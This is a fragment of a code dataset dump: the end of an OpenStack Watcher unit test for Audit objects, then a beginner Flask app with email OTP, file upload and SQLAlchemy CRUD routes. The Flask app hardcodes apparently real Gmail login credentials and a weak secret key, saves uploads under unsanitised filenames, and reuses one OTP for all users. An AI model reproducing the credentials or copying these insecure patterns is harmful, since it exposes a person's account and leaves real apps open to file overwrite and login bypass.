test_create(self):\n with mock.patch.object(self.dbapi, 'create_audit',\n autospec=True) as mock_create_audit:\n mock_create_audit.return_value = self.fake_audit\n audit = objects.Audit(self.context, **self.fake_audit)\n\n audit.create()\n mock_create_audit.assert_called_once_with(self.fake_audit)\n self.assertEqual(self.context, audit._context)\n\n def test_destroy(self):\n uuid = self.fake_audit['uuid']\n with mock.patch.object(self.dbapi, 'get_audit_by_uuid',\n autospec=True) as mock_get_audit:\n mock_get_audit.return_value = self.fake_audit\n with mock.patch.object(self.dbapi, 'destroy_audit',\n autospec=True) as mock_destroy_audit:\n audit = objects.Audit.get_by_uuid(self.context, uuid)\n audit.destroy()\n mock_get_audit.assert_called_once_with(self.context, uuid)\n mock_destroy_audit.assert_called_once_with(uuid)\n self.assertEqual(self.context, audit._context)\n\n def test_save(self):\n uuid = self.fake_audit['uuid']\n with mock.patch.object(self.dbapi, 'get_audit_by_uuid',\n autospec=True) as mock_get_audit:\n mock_get_audit.return_value = self.fake_audit\n with mock.patch.object(self.dbapi, 'update_audit',\n autospec=True) as mock_update_audit:\n audit = objects.Audit.get_by_uuid(self.context, uuid)\n audit.state = 'SUCCEEDED'\n audit.save()\n\n mock_get_audit.assert_called_once_with(self.context, uuid)\n mock_update_audit.assert_called_once_with(\n uuid, {'state': 'SUCCEEDED'})\n self.assertEqual(self.context, audit._context)\n\n def test_refresh(self):\n uuid = self.fake_audit['uuid']\n returns = [dict(self.fake_audit, state=\"first state\"),\n dict(self.fake_audit, state=\"second state\")]\n expected = [mock.call(self.context, uuid),\n mock.call(self.context, uuid)]\n with mock.patch.object(self.dbapi, 'get_audit_by_uuid',\n side_effect=returns,\n autospec=True) as mock_get_audit:\n audit = objects.Audit.get(self.context, uuid)\n self.assertEqual(\"first state\", audit.state)\n audit.refresh()\n self.assertEqual(\"second state\", audit.state)\n self.assertEqual(expected, mock_get_audit.call_args_list)\n self.assertEqual(self.context, audit._context)\n","sub_path":"watcher/tests/objects/test_audit.py","file_name":"test_audit.py","file_ext":"py","file_size_in_byte":5363,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"593945435","text":"from flask import Flask,redirect,url_for,render_template,request,flash\nfrom flask_mail import Mail,Message\nfrom random import randint \nfrom project_database import Register,Base\nfrom sqlalchemy.orm import sessionmaker\nfrom sqlalchemy import create_engine\n#engine=create_engine('sqlite:///iii.db')\nengine=create_engine('sqlite:///iii.db',connect_args={'check_same_thread':False},echo=True)\nBase.metadata.bind=engine\nDBsession=sessionmaker(bind=engine)\nsession=DBsession()\n\napp=Flask(__name__)\n\napp.config['MAIL_SERVER']='smtp.gmail.com'\napp.config['MAIL_PORT']=465\napp.config['MAIL_USERNAME']='kondalaraju429@gmail.com'\napp.config['MAIL_PASSWORD']='kondalarajumail.com'\napp.config['MAIL_USE_TLS']=False\napp.config['MAIL_USE_SSL']=True\napp.secret_key = 'abc'\n\nmail = Mail(app)\notp=randint(00000,99999)\n\"\"\"@app.route(\"/sample\")\ndef demo():\n\treturn \"Hello World good\"\n\n@app.route(\"/demo_msg\")\ndef d():\n\treturn \"Hello demo\"\n\n@app.route(\"/info/details\")\ndef demos():\n\treturn \"Hello Details\"\n\n@app.route(\"/details/<name>/<age>/<sal>\")\ndef info(name,age,sal):\n\treturn \"hello {} age: {} salary: {}\".format(name,age,sal)\"\"\"\n\n@app.route(\"/admin\")\ndef admin():\n\treturn \"hello admin\"\n\n@app.route(\"/student\")\ndef student():\n\treturn \"hello student\"\n\n@app.route(\"/staff\")\ndef staff():\n\treturn \"hello staff\"\n\n@app.route(\"/info/<name>\")\ndef admin_info(name):\n\tif name=='admin':\n\t\treturn redirect(url_for('admin'))\n\telif name=='student':\n\t\treturn redirect(url_for('student'))\n\telif name=='staff':\n\t\treturn redirect(url_for('staff'))\n\telse:\n\t\treturn \"NO URL\"\n\n@app.route(\"/data/<name>/<age>/<salary>\")\ndef demo_html(name,age,salary):\n\treturn render_template('sample.html',n=name,a=age,s=salary)\n\n@app.route(\"/info-data\")\ndef info_data():\n\tsno=\"1\"\n\tname=\"raju\"\n\tdepartment=\"cse\"\n\tbranch=\"cse1\"\n\n\treturn render_template('sample1.html',s_no=sno,n=name,d=department,b=branch)\n\n\ndata=[\n{'sno':1,'n':\"raju\",'d':\"department\",'b':\"cse\"},\n{'sno':2,'n':\"nkr\",'d':\"french\",'b':\"It\"},\n{'sno':3,'n':\"rju\",'d':\"department\",'b':\"cse\"}\n]\n@app.route(\"/dummy_data\")\ndef dummy():\n\treturn render_template('data.html',dummy_data=data)\n\n\n@app.route(\"/table/<int:num>\")\ndef table(num):\n\treturn render_template(\"table.html\",n=num)\n\n\n\n\n@app.route(\"/file_upload\",methods=['GET', 'POST'])\ndef file_upload():\n\treturn render_template(\"file_upload.html\")\n\n\n@app.route(\"/success\",methods=['GET', 'POST'])\ndef success():\n\tif request.method==\"POST\":\n\t\tf=request.files['file']\n\t\tf.save(f.filename)\n\n\t\treturn render_template(\"success.html\",f_name=f.filename)\n \n@app.route(\"/email\",methods=['GET','POST'])\ndef email():\n\treturn render_template(\"email.html\")\n@app.route(\"/email_verify\", methods=['GET','POST'])\ndef verify_email():\n\temail = request.form['email']\n\tmsg=Message(\"One Time Password\", sender=\"kondalaraju429@gmail.com\",recipients=[email])\n\tmsg.body=str(otp)\n\tmail.send(msg)\n\treturn render_template(\"v_email.html\")\n\n@app.route(\"/email_success\", methods=['POST','GET'])\ndef email_success():\n\tuser_otp=request.form['otp']\n\tif(otp==int(user_otp)):\n\t\treturn \"success\"\n\treturn \"invalid\"\n@app.route(\"/show\")\ndef showdb():\n\tregister=session.query(Register).all()\n\treturn render_template(\"show.html\",reg=register)\n@app.route(\"/New\",methods=['POST','GET'])\n\ndef addData():\n\tif request.method=='POST':\n\t\tnewData=Register(name=request.form['name'],surname=request.form['surname'],mobile=request.form['mobile'],branch=request.form['branch'],role=request.form['role'])\n\t\tsession.add(newData)\n\t\tsession.commit()\n\t\tflash(\"Data added....\")\n\t\treturn redirect(url_for('showdb'))\n\telse:\n\t\treturn render_template(\"new.html\")\n\n\n@app.route(\"/edit/<int:register_id>\",methods=['POST','GET'])\ndef editData(register_id):\n\teditedData = session.query(Register).filter_by(id=register_id).one()\n\tif request.method=='POST':\n\t\teditedData.name = request.form['name']\n\t\teditedData.surname = request.form['surname']\n\t\teditedData.mobile = request.form['mobile']\n\t\teditedData.email = request.form['email']\n\t\teditedData.branch = request.form['branch']\n\t\teditedData.role = request.form['role']\n\n\t\tsession.add(editedData)\n\t\tsession.commit()\n\t\tflash(\"Edited successfully\")\n\t\treturn redirect(url_for('showdb'))\n\telse:\n\t\treturn render_template('edit.html',register=editedData)\n\n@app.route(\"/delete/<int:register_id>\", methods=['POST','GET'])\ndef deleteData(register_id):\n\tdeletedData = session.query(Register).filter_by(id=register_id).one()\n\tif request.method=='POST':\t\n\t\tsession.delete(deletedData)\n\t\tsession.commit()\n\t\tflash(\"Deleted successfully\")\n\t\treturn redirect(url_for('showdb'))\n\telse:\n\t\treturn render_template('delete.html',register=deletedData)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n@app.route(\"/\")\ndef home():\n\treturn render_template(\"home.html\")\n\n\n\nif __name__=='__main__':\n\tapp.run(debug=True)\n","sub_path":"catalog/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4736,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
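A minimal sketch (an editorial addition, not part of the dataset itself) of how records like the ones above can be consumed. The file name 4164.jsonl is taken from the diff header, and only the fields visible in the records (seq_id, text, sub_path, program_lang) are assumed; everything else is illustrative.

import json

def iter_records(path):
    # Each non-blank line of a JSONL file is expected to be one JSON object.
    with open(path, encoding="utf-8") as fh:
        for line in fh:
            line = line.strip()
            if line:
                yield json.loads(line)

# Usage: print a short summary of every code sample in the dump.
for rec in iter_records("4164.jsonl"):
    code = rec["text"]  # the raw source code carried by the record
    print(rec["seq_id"], rec["sub_path"], rec["program_lang"], len(code))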